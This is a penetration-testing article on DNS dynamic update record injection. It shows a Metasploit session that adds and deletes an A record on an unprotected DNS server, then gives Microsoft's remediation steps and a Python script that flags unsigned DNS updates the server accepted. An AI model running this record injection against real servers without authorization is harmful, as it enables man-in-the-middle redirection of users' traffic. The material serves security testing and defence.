Network Penetration Testing

DNS Server Dynamic Update Record Injection

Dynamic DNS Updating allows clients to create and delete DNS records in a particular zone. In DHCP environments, this is useful so clients with changing IP addresses can update those addresses with the local DNS server.

A security risk arises when the DNS server does not restrict who can update these DNS records. A malicious actor on the network may attempt to modify records to perform man-in-the-middle (MITM) attacks.

During a Network Penetration Test, dynamic DNS updates are tested to see if access controls are in place.

Pentesting Dynamic Record Updates

During a network penetration test, the following Metasploit module can be used to update a record. Note that we need to provide the domain for the zone we are testing:

msf6 > use admin/dns/dyn_dns_update
msf6 auxiliary(admin/dns/dyn_dns_update) > set ACTION ADD
msf6 auxiliary(admin/dns/dyn_dns_update) > set RHOST 10.0.0.5
msf6 auxiliary(admin/dns/dyn_dns_update) > set DOMAIN example.com
DOMAIN => example.com
msf6 auxiliary(admin/dns/dyn_dns_update) > set HOSTNAME my-test-hostname
HOSTNAME => my-test-hostname
msf6 auxiliary(admin/dns/dyn_dns_update) > set IP 10.0.0.10
IP => 10.0.0.10
msf6 auxiliary(admin/dns/dyn_dns_update) > exploit

[+] Did not find an existing A record for my-test-hostname.example.com
[*] Sending dynamic DNS add message...
[+] The record 'my-test-hostname.example.com => 10.0.0.10' has been added!
[*] Auxiliary module execution completed

As a proof of concept, we can now query the DNS server to confirm the record has been added:

~$ nslookup
> server 10.0.0.5
Default server: 10.0.0.5
Address: 10.0.0.5#53
> my-test-hostname.example.com
Server:         10.0.0.5
Address:        10.0.0.5#53

Name:   my-test-hostname.example.com
Address: 10.0.0.10

If we need to clean up our record, we can run the following:

msf6 auxiliary(admin/dns/dyn_dns_update) > set ACTION DELETE
ACTION => DELETE
msf6 auxiliary(admin/dns/dyn_dns_update) > run

[+] Found existing A record for my-test-hostname.example.com
[*] Sending dynamic DNS delete message...
[+] The record 'my-test-hostname.example.com => 10.0.0.10' has been deleted!
[*] Auxiliary module execution completed

Penetration testers should also be aware that authorization can be granted by IP address, so testing from a privileged network may lead to false positives. This scenario is only likely where the DNS server is running software such as BIND; with Microsoft DNS, authentication is performed by Active Directory.

Remediation of Dynamic Record Injection

Microsoft has provided the following recommendations for securing dynamic DNS updates:

  1. Configure the DNS updates to Secure Only.
  2. Enable the Name Protection feature on the DHCP server.
  3. Authorize the DHCP server via the DNSUpdateProxy AD group to perform these updates.

The complete instruction steps can be found here: https://social.technet.microsoft.com/wiki/contents/articles/21984.how-to-secure-dns-updates-on-microsoft-dns-servers.aspx
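
To check from the network side whether these controls hold, the following added example (not part of the original article or of any tool it mentions) classifies a captured DNS request/response pair as a signed update, an unsigned update the server rejected, or an unsigned update the server accepted. It assumes authenticated updates carry a TSIG record (type 250) in the additional section; the function names and the sample messages are constructed for illustration.

```python
import struct

OPCODE_UPDATE = 5   # RFC 2136 dynamic update
TYPE_TSIG = 250     # RFC 8945 transaction signature RR

def _skip_name(msg, off):  # offset just past a domain name (labels or pointer)
    while msg[off] != 0:
        if msg[off] & 0xC0 == 0xC0:   # a 2-byte compression pointer ends the name
            return off + 2
        off += 1 + msg[off]
    return off + 1

def has_tsig(msg):
    """True if the additional section of an UPDATE message carries a TSIG RR."""
    zocount, prcount, upcount, adcount = struct.unpack("!4H", msg[4:12])
    off = 12
    for _ in range(zocount):          # zone entries are name + type + class
        off = _skip_name(msg, off) + 4
    for i in range(prcount + upcount + adcount):
        off = _skip_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        if i >= prcount + upcount and rtype == TYPE_TSIG:
            return True
        off += 10 + rdlen
    return False

def triage(request, response):
    """Classify one request/response pair observed at the DNS server."""
    if (struct.unpack("!H", request[2:4])[0] >> 11) & 0xF != OPCODE_UPDATE:
        return "not-update"
    if has_tsig(request):
        return "signed-update"
    rcode = struct.unpack("!H", response[2:4])[0] & 0xF   # 0 = NOERROR, 5 = REFUSED
    return "unsigned-update-accepted" if rcode == 0 else "unsigned-update-rejected"

# Constructed sample messages (hand-built bytes, not captured traffic).
ZONE = b"\x07example\x03com\x00"
ADD_A = b"\x10my-test-hostname" + ZONE + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([10, 0, 0, 10])
TSIG_RR = b"\x03key\x00" + struct.pack("!HHIH", TYPE_TSIG, 255, 0, 0)  # empty rdata, placeholder only

def make_update(signed):
    header = struct.pack("!6H", 0x1234, OPCODE_UPDATE << 11, 1, 0, 1, int(signed))
    return header + ZONE + struct.pack("!HH", 6, 1) + ADD_A + (TSIG_RR if signed else b"")

def make_response(rcode):
    return struct.pack("!6H", 0x1234, 0x8000 | (OPCODE_UPDATE << 11) | rcode, 0, 0, 0, 0)

if __name__ == "__main__":
    for signed, rcode in [(False, 0), (False, 5), (True, 0)]:
        print(signed, rcode, triage(make_update(signed), make_response(rcode)))
```

On a server that authorizes updates by source IP address, an accepted unsigned update can be legitimate, so compare the sender against the intended allow list before treating it as a finding.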
